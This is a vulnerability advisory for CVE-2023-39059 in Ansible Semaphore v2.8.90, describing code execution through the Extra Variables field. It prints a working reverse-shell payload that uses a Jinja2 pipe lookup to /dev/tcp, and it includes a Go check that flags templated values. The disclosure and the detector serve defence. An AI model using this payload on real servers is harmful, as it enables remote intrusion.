CVE-2023-39059

An issue in ansible semaphore v.2.8.90 allows a remote attacker to execute arbitrary code via a crafted payload to the extra variables parameter.


---------------------------------------------------------------

[VulnerabilityType Other]

Remote Command Execution (RCE)

---------------------------------------------------------------

[Affected Component]

Ansible Semaphore includes a feature called “Extra Variables.” This feature can be accessed at https://<semaphore-endpoint>/project/id/environment and is directly associated with the ansible-playbook --extra-vars flag.

---------------------------------------------------------------

[Attack Type]

Remote

---------------------------------------------------------------

[Impact Code execution]

true

---------------------------------------------------------------

[Impact Denial of Service]

true

---------------------------------------------------------------

[Impact Escalation of Privileges]

true

---------------------------------------------------------------

[Impact Information Disclosure]

true

---------------------------------------------------------------

[Attack Vectors]

The --extra-vars parameter can be abused by a malicious user with low privileges to achieve Remote Command Execution (RCE), read files and configurations, perform Server-Side Request Forgery (SSRF), execute commands, and establish a reverse shell on the Ansible server. Payload:

{"ansible_user": "{{ lookup('ansible.builtin.pipe', \"bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1337 <&1'\") }}"}
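
A pre-flight check for the issue described above, as an added example that is not part of the advisory or of Semaphore's code: it walks an extra-vars JSON document and reports every string value containing a Jinja2 delimiter, so such values can be rejected before they reach ansible-playbook --extra-vars. The function name FindTemplatedVars and the sample input are assumptions made for illustration, and the check assumes extra variables are supplied as JSON.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
	"strings"
)

// Jinja2 expression and statement delimiters.
var templateMarkers = []string{"{{", "{%"}

// FindTemplatedVars returns the JSON paths of all string values in an
// extra-vars document that contain a Jinja2 delimiter.
func FindTemplatedVars(raw string) ([]string, error) {
	var doc interface{}
	if err := json.Unmarshal([]byte(raw), &doc); err != nil {
		return nil, fmt.Errorf("extra vars are not valid JSON: %w", err)
	}
	var hits []string
	walk("$", doc, &hits)
	sort.Strings(hits) // map iteration order is random; sort for stable output
	return hits, nil
}

// walk descends through nested objects and arrays, recording flagged paths.
func walk(path string, v interface{}, hits *[]string) {
	switch t := v.(type) {
	case string:
		for _, m := range templateMarkers {
			if strings.Contains(t, m) {
				*hits = append(*hits, path)
				break
			}
		}
	case map[string]interface{}:
		for k, child := range t {
			walk(path+"."+k, child, hits)
		}
	case []interface{}:
		for i, child := range t {
			walk(fmt.Sprintf("%s[%d]", path, i), child, hits)
		}
	}
}

func main() {
	// Constructed sample input, not the payload from the advisory.
	fmt.Println(FindTemplatedVars(`{"env":"prod","ansible_user":"{{ lookup('ansible.builtin.env', 'HOME') }}"}`))
}
```

Rejecting every templated value is a strict policy: it also blocks legitimate templating in extra variables, so it suits deployments where low-privileged users can edit that field.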

---------------------------------------------------------------

[Has vendor confirmed]

true

---------------------------------------------------------------

[Discoverer]

@alevsk

---------------------------------------------------------------

[Reference]

https://www.alevsk.com/2023/07/a-quick-story-of-security-pitfalls-with-execcommand-in-software-integrations/

---------------------------------------------------------------

[Vendor of Product]

ansible semaphore

---------------------------------------------------------------

[Affected Product Code Base]

ansible semaphore v2.8.90

---------------------------------------------------------------

Related news

GHSA-3r32-cp7v-5wq4: Code injection in ansible semaphore
